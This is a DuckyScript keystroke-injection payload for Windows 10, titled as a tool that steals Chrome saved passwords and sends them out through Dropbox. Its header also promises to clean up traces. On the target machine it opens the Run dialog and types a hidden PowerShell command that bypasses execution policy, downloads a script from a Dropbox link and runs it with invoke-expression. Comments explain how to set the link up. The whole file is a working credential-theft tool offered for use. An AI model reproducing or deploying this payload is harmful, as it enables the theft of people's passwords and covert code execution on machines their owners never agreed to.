REM #########################################################################################################
REM #                                                               |                                       #
REM # Title        : Browser-Passwords-Dropbox-Exfiltration         |   ____ _____   ______                 #
REM # Author       : DIYS.py                                        |  |  _ \_ _\ \ / / ___|  _ __  _   _   #
REM # Version      : 1.0                                            |  | | | | | \ V /\___ \ | '_ \| | | |  #
REM # Category     : Credentials, Exfiltration                      |  | |_| | |  | |  ___) || |_) | |_| |  #
REM # Target       : Windows 10                                     |  |____/___| |_| |____(_) .__/ \__, |  #
REM # Mode         : HID                                            |                        |_|    |___/   #
REM # Props        : I am Jakoby, NULLSESSION0X                     |                                       #
REM #                                                               |                                       # 
REM #########################################################################################################

REM Title: Browser-Passwords-Dropbox-Exfiltration
REM Author: DIYS.py
REM Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.
REM              Then it cleans up traces of what you have done after.
REM Target: Windows 10 (PowerShell + Chrome)
REM Version: 1.0
REM Category: Credentials, Exfiltration


DELAY 3000
GUI r
DELAY 250
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl

REM     Remember to replace the link with your DropBox shared link for the intended file to download
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
